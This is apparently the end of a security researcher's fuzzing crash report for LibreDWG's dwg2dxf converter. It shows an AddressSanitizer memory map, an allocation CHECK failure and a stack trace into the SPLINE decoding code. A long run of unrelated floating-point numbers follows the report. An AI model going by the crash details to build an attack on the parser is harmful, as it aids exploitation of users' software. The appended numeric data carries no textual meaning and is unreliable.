0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # # --- end body ---
5,103
[ -0.040259428322315216, 0.031271565705537796, -0.007926365360617638, -0.0029268665239214897, 0.05944386497139931, 0.05045600235462189, -0.003947686403989792, 0.04063133895397186, -0.013295838609337807, 0.027227025479078293, -0.012094873934984207, 0.0012610126286745071, -0.004288605414330959, 0.008383506909012794, 0.008685684762895107, 0.011854681186378002, -0.010452264919877052, 0.011629984714090824, -0.024205245077610016, -0.031596988439559937, 0.01480672974139452, -0.009088588878512383, -0.028063828125596046, 0.02711855247616768, -0.01644159108400345, -0.0005568988271988928, 0.013233853504061699, -0.009925389662384987, -0.01247453410178423, 0.020641092211008072, 0.005667777266353369, 0.028296271339058876, 0.015759753063321114, 0.012776711955666542, 0.05088990181684494, -0.029489489272236824, 0.06855569779872894, 0.06427871435880661, 0.01813068985939026, 0.03595145046710968, -0.0005656155408360064, -0.07500216364860535, -0.020114216953516006, 0.014496803283691406, -0.0012639182386919856, -0.008980114944279194, 0.015868227928876877, -0.0011312310816720128, -0.004017419647425413, 0.019215431064367294, -0.021865300834178925, -0.006791260093450546, -0.03846185654401779, -0.0697954073548317, 0.011397539637982845, -0.013412061147391796, 0.03483571857213974, 0.02793985605239868, 0.010095849633216858, 0.006299252156168222, -0.015837235376238823, 0.0284977238625288, -0.011970903724431992, 0.022345686331391335, 0.01981978677213192, 0.01789824478328228, -0.02214423567056656, 0.005594169721007347, -0.024747615680098534, -0.0028396998532116413, -0.0023786844685673714, -0.04276983067393303, 0.010173331014811993, 0.022020263597369194, 0.018719548359513283, -0.014613025821745396, -0.005164147354662418, 0.002150113694369793, -0.0069346013478934765, 0.011459525674581528, -0.02344592474400997, 0.041530124843120575, -0.03641634061932564, 0.012815453112125397, 0.010142338462173939, 0.0005331701249815524, -0.00911183375865221, -0.07562202215194702, 0.01376072783023119, -0.04673688858747482, -0.0009220307692885399, 0.038554832339286804, 0.02544495090842247, -0.003023718483746052, 0.0020183951128274202, -0.004737998358905315, -0.04968118667602539, -0.005551555193960667, -0.049154311418533325, 0.000018810469555319287, -0.04686085879802704, -0.004490057472139597, -0.009770426899194717, 0.011506014503538609, 0.022516146302223206, 0.02095101773738861, 0.014760240912437439, 0.002119121141731739, 0.012327319011092186, 0.1172141283750534, 0.012482281774282455, -0.007205786649137735, -0.0024968439247459173, 0.015535056591033936, 0.0007646463345736265, 0.011079865507781506, 0.0284977238625288, -0.021539878100156784, -0.06133441627025604, -0.021632855758070946, 0.006055185105651617, -0.03353402763605118, -0.027072062715888023, -0.012273081578314304, -0.03362700343132019, 0.016147160902619362, 0.016627546399831772, -0.021555375307798386, -0.00975493062287569, -0.011777199804782867, -0.027893368154764175, -0.04326571151614189, 0.012319570407271385, -0.04280082508921623, 0.02961345948278904, -0.004536546301096678, -0.044257476925849915, 0.03870979696512222, 0.020129714161157608, 0.008639195933938026, -0.05724338814616203, -0.040135458111763, 0.028280775994062424, -0.002231469377875328, -0.038554832339286804, 0.007186416536569595, -0.040724318474531174, 0.009297789074480534, 0.0010644032154232264, -0.0059660812839865685, -0.0240812748670578, -0.02078055962920189, 0.019137948751449585, 0.030775683000683784, 0.04453641176223755, -0.02711855247616768, 0.003277470823377371, 0.031271565705537796, 0.023213481530547142, -0.04388556629419327, 0.005388843826949596, -0.012714726850390434, 0.014605277217924595, -0.03641634061932564, -0.03384395316243172, -0.011908918619155884, 0.020176202058792114, 0.013954431749880314, -0.02175682783126831, 0.020827047526836395, 0.005156399216502905, -0.0021443027071654797, 0.031581491231918335, 0.041840050369501114, -0.05845210328698158, 0.004896835889667273, -0.004180131014436483, 0.017851755023002625, 0.005776251666247845, -0.018084200099110603, -0.0013636758085340261, 0.00493557658046484, 0.004803857766091824, 0.016952969133853912, 0.012381556443870068, -0.005082791671156883, 0.044505417346954346, 0.001094427308999002, -0.0013065331149846315, -0.023399436846375465, -0.005501192063093185, 0.005896348040550947, 0.001019851304590702, -0.018270155414938927, 0.0188745129853487, -0.01622464321553707, -0.033596012741327286, 0.006434844806790352, 0.026824122294783592, -0.004160760901868343, 0.002758344169706106, 0.0014711814001202583, -0.013652253895998001, 0.014698254875838757, -0.014016417786478996, -0.0005573831149376929, -0.006605304311960936, 0.059195924550294876, 0.0075273350812494755, -0.019649328663945198, -0.017123429104685783, -0.0336889885365963, 0.005067295394837856, 0.00323872989974916, -0.02776939794421196, 0.004753494635224342, -0.015093411318957806, 0.026142284274101257, -0.029117576777935028, -0.022609123960137367, 0.02143140509724617, 0.001346242381259799, 0.00479610962793231, -0.010134590789675713, -0.06170632690191269, -0.004920080304145813, 0.005733636673539877, 0.025413958355784416, -0.052532508969306946, -0.005853733047842979, 0.02039315178990364, -0.03654031082987785, -0.0025685143191367388, 0.008484233170747757, -0.022857066243886948, -0.01480672974139452, -0.010204323567450047, 0.00830602552741766, -0.021446900442242622, 0.004877465311437845, 0.03635435551404953, 0.014659514650702477, -0.007120557129383087, -0.005481821484863758, 0.00740336487069726, 0.028466731309890747, -0.017138924449682236, -0.006651793606579304, -0.01678250916302204, 0.02095101773738861, 0.014698254875838757, -0.015000433661043644, 0.013202860951423645, 0.023058516904711723, 0.011242576874792576, 0.015039173886179924, 0.03201538696885109, 0.022671109065413475, -0.01910695619881153, -0.04729475453495979, 0.04227394983172417, -0.009654204361140728, -0.006690534297376871, 0.005063421092927456, 0.008484233170747757, -0.01132005825638771, -0.00890263356268406, 0.02350790984928608, -0.0027176663279533386, -0.039205677807331085, 0.039205677807331085, -0.01957184635102749, 0.004226619843393564, -0.017123429104685783, -0.012660489417612553, 0.00939076766371727, 0.032945167273283005, -0.006613052450120449, 0.006973342038691044, -0.02665366232395172, 0.007267771754413843, 0.017309384420514107, -0.0256928913295269, 0.03588946536183357, -0.007027579005807638, -0.020005743950605392, -0.020749567076563835, -0.0256773941218853, -0.019246423617005348, -0.020734069868922234, -0.01974230632185936, -0.0016009630635380745, -0.03716016560792923, -0.012296326458454132, -0.010405776090919971, 0.04060034826397896, 0.011374295689165592, -0.004699257668107748, -0.03641634061932564, -0.016890984028577805, -0.024608148261904716, -0.01718541420996189, 0.0010179142700508237, -0.009491492994129658, -0.03641634061932564, -0.0036125786136835814, -0.015473071485757828, 0.0284977238625288, -0.013582520186901093, -0.013102134689688683, 0.022888058796525, -0.053245339542627335, -0.011629984714090824, -0.021400412544608116, -0.031984396278858185, -0.009406263940036297, 0.02254713885486126, -0.04611703380942345, 0.010064857080578804, 0.007996099069714546, -0.03898872807621956, 0.010824176482856274, -0.03954659774899483, 0.015589293092489243, 0.05017707124352455, -0.027970848605036736, -0.004257612861692905, 0.053090378642082214, -0.06114846095442772, 0.02736649289727211, 0.007798520848155022, -0.029582466930150986, -0.019478868693113327, -0.030357282608747482, -0.01316411979496479, -0.042087994515895844, -0.040662333369255066, 0.012830949388444424, 0.014132639393210411, -0.00786050595343113, -0.012552015483379364, 0.0345257893204689, -0.02087353728711605, -0.01219560019671917, 0.009894397109746933, -0.01836313307285309, 0.016162656247615814, -0.01933940127491951, 0.03468075394630432, -0.014148135669529438, 0.001109923585318029, 0.058390118181705475, -0.008817403577268124, 0.026917099952697754, 0.0025123402010649443, -0.0529664047062397, 0.007341379299759865, -0.04549718275666237, 0.022268205881118774, -0.009057596325874329, -0.0005263904458843172, -0.011606740765273571, -0.001959315501153469, 0.022097745910286903, 0.01989726908504963, 0.0011409162543714046, -0.012621749192476273, 0.008406750857830048, 0.00276802945882082, 0.01192441489547491, -0.03018682263791561, 0.05786324292421341, -0.012459037825465202, -0.023228976875543594, -0.020129714161157608, -0.03176744654774666, 0.04109622910618782, 0.008290529251098633, -0.03164347633719444, 0.009251300245523453, -0.018254660069942474, -0.010560738854110241, 0.0001927354169311002, -0.031194083392620087, 0.027567945420742035, 0.047635674476623535, -0.01596120558679104, 0.04131317883729935, -0.014349588192999363, -0.03712917119264603, -0.006539445370435715, 0.07642782479524612, -0.006225644610822201, -0.04447442665696144, 0.01528711523860693, 0.03570351004600525, -0.025615409016609192, -0.017309384420514107, 0.01597670093178749, -0.055569786578416824, -0.005350103136152029, 0.0148454699665308, -0.023461421951651573, -0.01007260475307703, 0.03300715237855911, 0.04103424400091171, -0.0035447822883725166, -0.017200909554958344, 0.021663848310709, -0.00027118553407490253, -0.0008271158440038562, -0.013629009947180748, -0.014860966242849827, 0.004315723665058613, 0.06880363821983337, 0.029086584225296974, 0.0016706965398043394, 0.01046776119619608, -0.03179844096302986, 0.006791260093450546, 0.0022411546669900417, 0.00818980298936367, 0.01332683116197586, 0.02375585213303566, -0.0003147688985336572, 0.009840160608291626, -0.010436768643558025, 0.018084200099110603, 0.026188774034380913, -0.03874078765511513, -0.03049674816429615, 0.02054811455309391, 0.020486129447817802, 0.0284977238625288, -0.026467707008123398, -0.03598244488239288, -0.01268373429775238, -0.03626137971878052, 0.016317620873451233, 0.0017743281787261367, 0.022423168644309044, 0.014434818178415298, -0.02880765125155449, 0.015256122685968876, -0.018254660069942474, -0.031333550810813904, -0.03660229593515396, -0.011691969819366932, 0.029582466930150986, -0.047945600003004074, 0.0028939368203282356, 0.012528771534562111, -0.02800184302031994, -0.0066169267520308495, 0.0016968465643003583, -0.009630960412323475, -0.030791178345680237, -0.008259535767138004, 0.03942262753844261, 0.010506502352654934, -0.01099463552236557, 0.02400379255414009, -0.0188590157777071, -0.010762191377580166, 0.016100671142339706, 0.035827480256557465, 0.04348266124725342, -0.025243498384952545, 0.007372372318059206, 0.008569462224841118, 0.009414011612534523, 0.007136053405702114, 0.003792723175138235, -0.0030934519600123167, 0.002101687714457512, 0.04069332405924797, -0.004672138951718807, -0.0160541832447052, -0.029582466930150986, -0.009088588878512383, -0.008809654973447323, -0.015225130133330822, 0.002562703099101782, -0.031984396278858185, 0.033193107694387436, -0.015341352671384811, 0.038802772760391235, 0.012497778050601482, 0.022903554141521454, 0.03387494385242462, 0.02087353728711605, 0.01196315512061119, -0.025584416463971138, -0.04295578598976135, -0.0038179047405719757, 0.027800390496850014, -0.0032464780379086733, -0.021927285939455032, 0.04004247859120369, 0.020486129447817802, 0.03244928643107414, -0.013257097452878952, 0.03235630691051483, -0.007283268496394157, 0.020362159237265587, 0.006551067344844341, -0.03347204253077507, -0.004284731112420559, -0.0022024137433618307, -0.04710879921913147, 0.00943725649267435, -0.03107011318206787, 0.02262462116777897, -0.05169570818543434, 0.005013057962059975, -0.01452004723250866, 0.0030702075455337763, 0.0004002407658845186, 0.0025568921118974686, 0.0022566509433090687, -0.010692457668483257, -0.03973255306482315, -0.0069539714604616165, 0.023957304656505585, 0.004648894537240267, 0.013907942920923233, 0.008383506909012794, -0.013481794856488705, 0.02590983919799328, -0.03356501832604408, -0.010227568447589874, -0.0009394641383551061, -0.023817837238311768, 0.02673114463686943, -0.006740897428244352, 0.026018314063549042, -0.014582033269107342, 0.03508365899324417, -0.01127356942743063, -0.007631935179233551, -0.0337199829518795, 0.023709362372756004, -0.04159210994839668, 0.00325035210698843, 0.002655680989846587, 0.019246423617005348, -0.005985451862215996, 0.0188590157777071, 0.0053927176631987095, -0.011064369231462479, -0.014899707399308681, 0.0029191183857619762, -0.010746695101261139, 0.00975493062287569, -0.014357335865497589, 0.009723938070237637, -0.014907455071806908, -0.01861107535660267, 0.016581058502197266, -0.00039951439248397946, 0.013381068594753742, -0.013195112347602844, 0.024143259972333908, -0.006248889025300741, 0.004645020700991154, 0.007329757325351238, 0.0013907942920923233, 0.020439639687538147, -0.05715041235089302, -0.03176744654774666, 0.014953944832086563, 0.0001664643205003813, 0.011870177462697029, -0.006671163719147444, -0.027831383049488068, 0.005601917859166861, -0.012164607644081116, 0.002489095786586404, -0.006539445370435715, -0.030636215582489967, 0.0006372859934344888, -0.05340030416846275, -0.007023705169558525, 0.023321954533457756, 0.02070307731628418, -0.022655613720417023, -0.0015912778908386827, 0.0009568975074216723, 0.031240571290254593, -0.009305537678301334, 0.015790745615959167, 0.0021869174670428038, -0.001872148597612977, -0.00553605891764164, 0.01561253797262907, 0.008197550661861897, -0.009142826311290264, 0.00009533866250421852, -0.010475508868694305, -0.00970844179391861, -0.010591731406748295, 0.02711855247616768, 0.02264011651277542, -0.048968356102705, -0.040259428322315216, 0.015666775405406952, 0.012737971730530262, -0.009003358893096447, -0.025863351300358772, 0.010126842185854912, 0.03145752102136612, 0.013512787409126759, 0.056716516613960266, -0.0006924915942363441, 0.02231469377875328, -0.0021636730525642633, 0.006291504018008709, 0.009948634542524815, -0.0320773720741272, 0.018719548359513283, 0.0027157291769981384, -0.023786844685673714, 0.010475508868694305, 0.005632910877466202, 0.016193648800253868, 0.03570351004600525, 0.00947599671781063, -0.006721526850014925, -0.01644159108400345, -0.0008455177303403616, -0.030217815190553665, 0.016906479373574257, 0.007248401641845703, -0.017541829496622086, -0.0204706322401762, 0.030961638316512108, 0.033193107694387436, 0.026095794513821602, -0.013822713866829872, 0.012257585301995277, 0.0038740788586437702, -0.004920080304145813, -0.004304101690649986, 0.014341839589178562, -0.01630212366580963, 0.007899247109889984, -0.004811605904251337, 0.021074989810585976, 0.048441480845212936, 0.054051149636507034, -0.017541829496622086, -0.007058571558445692, -0.0038334010168910027, 0.01837863028049469, 0.01989726908504963, 0.002264399081468582, 0.03557953983545303, 0.03672626614570618, 0.02665366232395172, 0.021663848310709, -0.003498293226584792, -0.0013510850258171558, -0.04125119373202324, 0.009638708084821701, 0.003680374938994646, 0.004780613351613283, -0.02984590455889702, 0.004827102180570364, 0.01620914600789547, 0.01820817030966282, -0.0029036221094429493, -0.0011680347379297018, -0.001314281253144145, -0.0050401766784489155, -0.013350076042115688, -0.008856144733726978, 0.020021239295601845, 0.029737429693341255, -0.01268373429775238, 0.0036067673936486244, -0.0037307380698621273, -0.006613052450120449, 0.0108319241553545, -0.012552015483379364, -0.024592652916908264, 0.005923466756939888, -0.0006818379042670131, -0.0024367955047637224, -0.016178153455257416, -0.02834276109933853, 0.01847160793840885, -0.011196088045835495, 0.014736996032297611, 0.01307889074087143, 0.038647811859846115, -0.020036736503243446, 0.04311075061559677, -0.030558733269572258, -0.019633831456303596, 0.0049317022785544395, -0.023461421951651573, 0.0008987862966023386, 0.0039283158257603645, -0.018347637727856636, 0.022841569036245346, 0.013993172906339169, -0.01387695036828518, -0.006082303822040558, 0.024251732975244522, 0.013419808819890022, -0.011560251004993916, 0.007147675380110741, -0.025940831750631332, 0.007205786649137735, 0.0025123402010649443, -0.023259969428181648, 0.012861941941082478, 0.014543292112648487, -0.0038857010658830404, 0.006671163719147444, -0.011544754728674889, -0.04007347300648689, 0.00664017116650939, -0.048999350517988205, 0.00014660967281088233, -0.023058516904711723, 0.0032212964724749327, 0.0001751810050336644, -0.0031844929326325655, 0.00931328535079956, 0.016317620873451233, -0.02479410544037819, 0.022190723568201065, 0.01651907153427601, -0.0377490259706974, 0.016085175797343254, 0.023399436846375465, -0.01692197658121586, 0.00511765806004405, 0.012234341353178024, -0.0023883695248514414, 0.014078402891755104, 0.029164066538214684, -0.02256263606250286, -0.00786438025534153, 0.011932162567973137, 0.008801907300949097, -0.002215973101556301, -0.0176503024995327, 0.02945849485695362, 0.004598531406372786, 0.013582520186901093, 0.00073510647052899, -0.02022269181907177, -0.0027060441207140684, -0.013458549976348877, 0.026824122294783592, -0.027629930526018143, 0.008770914748311043, -0.014287603087723255, -0.03424685820937157, 0.03722215071320534, -0.00894137378782034, 0.022407671436667442, 0.043451666831970215, -0.018347637727856636, 0.004765117075294256, -0.04050736874341965, 0.014675010927021503, 0.002874566474929452, 0.03186042606830597, -0.003384007839486003, -0.014241114258766174, -0.006124918814748526, 0.010289553552865982, -0.008399003185331821, 0.016240138560533524, 0.003953497391194105, 0.02993888221681118, 0.01404741033911705, -0.01500818133354187, -0.0035428451374173164, -0.03257325664162636, 0.0060280668549239635, -0.0010421272600069642, -0.0030450259801000357, 0.040414389222860336, -0.011846933513879776, -0.000616947072558105, 0.01861107535660267, 0.0036396970972418785, -0.009142826311290264, 0.039608582854270935, -0.019199935719370842, -0.005671651568263769, -0.01726289466023445, 0.02133842557668686, 0.008925877511501312, -0.021803315728902817, -0.03272821754217148, 0.04131317883729935, -0.02649869956076145, -0.041127219796180725, -0.03331707790493965, -0.007666802033782005, -0.024623645469546318, -0.026467707008123398, 0.026669159531593323, -0.02270210161805153, 0.02079605497419834, -0.00004440057455212809, -0.001716216909699142, 0.01236606016755104, 0.03762505576014519, -0.0034111265558749437, -0.005605792161077261, 0.004203375428915024, -0.0030062852893024683, -0.0013578645884990692, 0.024298222735524178, -0.024980060756206512, 0.010901657864451408, 0.000087893167801667, -0.047325748950242996, -0.00830602552741766, -0.023306459188461304, 0.01268373429775238, 0.0031476891599595547, 0.02504204586148262, 0.0008547186735086143, 0.00044164498103782535, 0.00216754712164402, -0.011343303136527538, 0.006733149290084839, 0.018394125625491142, 0.02511952817440033, 0.018580082803964615, -0.004125894047319889, -0.0034731116611510515, 0.04806957021355629, -0.016395101323723793, -0.005454703234136105, -0.008383506909012794, 0.006465837825089693, -0.019540853798389435, -0.021322930231690407, -0.02318248711526394, 0.010010619647800922, 0.012815453112125397, 0.010979139246046543, 0.0449703074991703, 0.01868855580687523, -0.014791233465075493, 0.0045016794465482235, 0.0016271130880340934, 0.011103110387921333, 0.02239217609167099, -0.002303140005096793, 0.011831437237560749, -0.011614488437771797, 0.0328831821680069, -0.011397539637982845, 0.0037249268498271704, -0.005156399216502905, 0.01709243655204773, 0.02102850005030632, -0.024298222735524178, -0.03908170759677887, 0.01252102293074131, -0.03186042606830597, -0.03970155864953995, -0.018115192651748657, 0.007457601837813854, -0.002072632312774658, -0.015620285645127296, -0.03384395316243172, -0.0070469495840370655, -0.009414011612534523, 0.02784687839448452, 0.04060034826397896, -0.0063961041159927845, -0.008631447330117226, -0.005020806100219488, 0.01726289466023445, 0.006543319206684828, -0.05804919824004173, 0.009166070260107517, -0.010932650417089462, -0.014589780941605568, -0.015325856395065784, 0.00023050769232213497, 0.013977676630020142, -0.05383419990539551, -0.02993888221681118, 0.03204638138413429, 0.027986345812678337, -0.02030017413198948, -0.01343530509620905, -0.042180970311164856, -0.016643043607473373, -0.016627546399831772, -0.0031457520090043545, 0.026948092505335808, -0.017867252230644226, 0.003678437788039446, -0.02256263606250286, 0.04338968172669411, 0.006609178613871336, 0.0013869202230125666, 0.01393118780106306, -0.0008309899130836129, -0.0014227554202079773, 0.014791233465075493, -0.03097713552415371, -0.010328294709324837, 0.006566563621163368, -0.026343736797571182, 0.0010498753981664777, 0.016116168349981308, 0.02222171612083912, 0.00370168243534863, 0.006911356933414936, -0.025971824303269386, 0.007786898408085108, -0.0021113730035722256, -0.024608148261904716, -0.014706003479659557, 0.0014072591438889503, -0.009251300245523453, -0.006070681381970644, -0.006791260093450546, 0.0021636730525642633, 0.04125119373202324, 0.005237754434347153, 0.03032629005610943, -0.0013830461539328098, -0.004889087751507759, 0.00147021294105798, -0.013148623518645763, -0.02793985605239868, -0.014667262323200703, 0.015945708379149437, 0.026219766587018967, -0.007662928197532892, 0.001024693832732737, -0.004098775330930948, -0.01251327432692051, -0.016426093876361847, -0.0001230019988724962, -0.017681296914815903, -0.030992630869150162, -0.011947658844292164, -0.008058084174990654, -0.009731685742735863, -0.011459525674581528, 0.022888058796525, -0.018394125625491142, 0.0016048371326178312, -0.006469711661338806, 0.0296909399330616, 0.002221784321591258, 0.016643043607473373, -0.017867252230644226, -0.006496830377727747, 0.006310874596238136, 0.02978391759097576, -0.05724338814616203, -0.010165583342313766, -0.004854220896959305, -0.007767528295516968, -0.01853359304368496, 0.009840160608291626, 0.01437283307313919, 0.011823688633739948, -0.016085175797343254, 0.02127644047141075, -0.021462397649884224, -0.025816861540079117, -0.00200483575463295, 0.02488708309829235, -0.03341005742549896, 0.03341005742549896, 0.011986400000751019, 0.0026246884372085333, -0.023089509457349777, -0.021400412544608116, 0.020129714161157608, 0.021663848310709, -0.012939423322677612, 0.007879876531660557, 0.006922978907823563, 0.005412088241428137, 0.019881771877408028, -0.03406090289354324, 0.00016210599278565496, 0.006465837825089693, -0.0016784446779638529, -0.018347637727856636, -0.014620773494243622, 0.014310847036540508, -0.02632823958992958, -0.0216793455183506, 0.013016904704272747, -0.009491492994129658, -0.011800444684922695, -0.0007990287849679589, -0.009630960412323475, 0.02456166036427021, -0.009259048849344254, -0.01636410877108574, -0.007538957521319389, 0.00990989338606596, 0.037284135818481445, -0.020005743950605392, 0.01489195879548788, -0.02392631024122238, -0.02502654865384102, 0.011475021950900555, 0.022764086723327637, 0.03722215071320534, -0.008817403577268124, -0.0013820776948705316, -0.016674036160111427, -0.0016397038707509637, 0.018084200099110603, 0.021400412544608116, -0.004005797673016787, -0.007790772709995508, 0.026421217247843742, 0.005338480696082115, -0.0048348503187298775, 0.010878413915634155, 0.009561226703226566, 0.003492482006549835, -0.025878846645355225, -0.015372345224022865, 0.01620914600789547, -0.02775390073657036, -0.02511952817440033, 0.010847420431673527, 0.04648894816637039, 0.0012309885350987315, -0.017200909554958344, 0.002376747317612171, -0.0060629332438111305, 0.016875486820936203, 0.005783999804407358, 0.0018537467112764716, 0.016007693484425545, -0.03706718608736992, 0.03808994218707085, -0.00012457584671210498, 0.05770827829837799, -0.031085608527064323, -0.020424144342541695, 0.003974805120378733, -0.009181566536426544, -0.024437690153717995, 0.004168509040027857, -0.02014520950615406, -0.017076939344406128, -0.015062418766319752, 0.014938448555767536, -0.021555375307798386, -0.024856090545654297, -0.009096337482333183, -0.0160541832447052, 0.021493390202522278, 0.003912819549441338, 0.0032949040178209543, 0.005156399216502905, 0.030899653211236, -0.008732173591852188, -0.005326858256012201, 0.050363026559352875, -0.014620773494243622, 0.008646943606436253, 0.0004656158562283963, -0.011312310583889484, -0.026622669771313667, 0.0009186409297399223, -0.009576722979545593, -0.014287603087723255, 0.03260424733161926, -0.030047355219721794, 0.012861941941082478, 0.02110598236322403, -0.011684222146868706, 0.023476917296648026, -0.009251300245523453, -0.02358539216220379, -0.017371369525790215, 0.00927454512566328, -0.009669700637459755, -0.0184561125934124, -0.02053261734545231, 0.013365572318434715, 0.10153185576200485, -0.03082217089831829, 0.007740409579128027, -0.017603814601898193, 0.01854909025132656, 0.009375270456075668, -0.002682799706235528, 0.01517089270055294, -0.013202860951423645, -0.004753494635224342, 0.008747669868171215, -0.006190778221935034, -0.009615464136004448, 0.00011591970542212948, 0.028513221070170403, -0.0009031446534208953, -0.017681296914815903, -0.014233365654945374, 0.03734612092375755, -0.0063961041159927845, 0.015263870358467102, -0.0012406737077981234, 0.013071142137050629, -0.011056621558964252, 0.02679312974214554, -0.019323905929923058, -0.011676473543047905, -0.023569896817207336, -0.026033809408545494, -0.021245447918772697, 0.006760267540812492, -0.010227568447589874, -0.021121477708220482, -0.004346716683357954, 0.009297789074480534, 0.009282292798161507, 0.01983528397977352, 0.010173331014811993, -0.00541596207767725, 0.0030140334274619818, 0.0010953957680612803, -0.010429020039737225, -0.018440615385770798, -0.010157834738492966, 0.0075079649686813354, -0.003938001114875078, 0.0377180315554142, 0.0018953931285068393, -0.018409622833132744, -0.01283869706094265, 0.01019657589495182, -0.01630212366580963, 0.03570351004600525, 0.009336530230939388, 0.00990989338606596, 0.03437082841992378, 0.003750108415260911, -0.010901657864451408, -0.013295838609337807, -0.021958278492093086, -0.008112321607768536, 0.012420296669006348, -0.02295004390180111, -0.013109883293509483, 0.005241628736257553, -0.006492956075817347, -0.01933940127491951, 0.007841135375201702, -0.016890984028577805, 0.03168996423482895, 0.014984937384724617, 0.010870665311813354, -0.0005539932753890753, -0.007325883023440838, 0.018921000882983208, 0.00814331416040659, 0.013861454091966152, 0.021291937679052353, -0.01814618520438671, -0.014736996032297611, 0.03970155864953995, 0.02663816697895527, -0.004307975526899099, 0.027165040373802185, -0.012939423322677612, 0.025088535621762276, -0.019044971093535423, -0.01452004723250866, 0.004997561685740948, -0.004459064919501543, 0.004602405708283186, 0.005272621288895607, 0.017712289467453957, 0.004889087751507759, 0.0017123428406193852, 0.030357282608747482, 0.02496456354856491, -0.011978652328252792, -0.015759753063321114, -0.018394125625491142, -0.007139927241951227, -0.011180591769516468, 0.015767501667141914, -0.015426581725478172, -0.0011341365752741694, 0.00631862273439765, -0.002934614662081003, 0.021694840863347054, 0.023244474083185196, -0.024096770212054253, -0.03097713552415371, -0.026746639981865883, 0.01613166369497776, 0.011746207252144814, 0.003889575134962797, 0.03790398687124252, 0.009135077707469463, -0.01572101190686226, -0.01966482400894165, -0.03396792337298393, -0.005938963033258915, -0.032542262226343155, 0.0369122251868248, -0.02696358971297741, -0.008135565556585789, -0.0008440649253316224, -0.0076396833173930645, -0.016890984028577805, 0.02296553924679756, 0.021942783147096634, 0.03437082841992378, 0.012970415875315666, 0.003974805120378733, -0.015790745615959167, 0.021369419991970062, -0.012629496864974499, 0.014628522098064423, 0.013373319990932941, -0.008577210828661919, 0.0013801405439153314, -0.015232877805829048, 0.03186042606830597, 0.02663816697895527, -0.0033975671976804733, 0.001823722617700696, 0.003046963131055236, 0.01560478936880827, 0.006167533341795206, 0.00806583184748888, 0.03347204253077507, 0.010421272367238998, -0.01709243655204773, 0.011343303136527538, 0.020563609898090363, 0.007461476139724255, 0.013202860951423645, 0.012118118815124035, -0.014628522098064423, 0.007577698212116957, 0.003149626078084111, 0.013938935473561287, -0.016565561294555664, 0.002607255009934306, -0.008151061832904816, -0.011777199804782867, 0.02671564742922783, -0.0012706979177892208, -0.050115086138248444, -0.009785923175513744, -0.022733094170689583, 0.002425173297524452, 0.011211584322154522, -0.010336042381823063, 0.005617414601147175, 0.01372198760509491, -0.018440615385770798, -0.0007317166309803724, 0.03412288799881935, 0.02855970896780491, -0.023817837238311768, 0.008034839294850826, 0.012412548996508121, 0.010390279814600945, 0.010243064723908901, 0.01387695036828518, -0.03790398687124252, -0.0035099154338240623, -0.0002184011973440647, -0.031116601079702377, 0.018719548359513283, 0.010111345909535885, 0.03740810602903366, -0.0026673031970858574, -0.017123429104685783, -0.0022508397232741117, -0.005276495590806007, 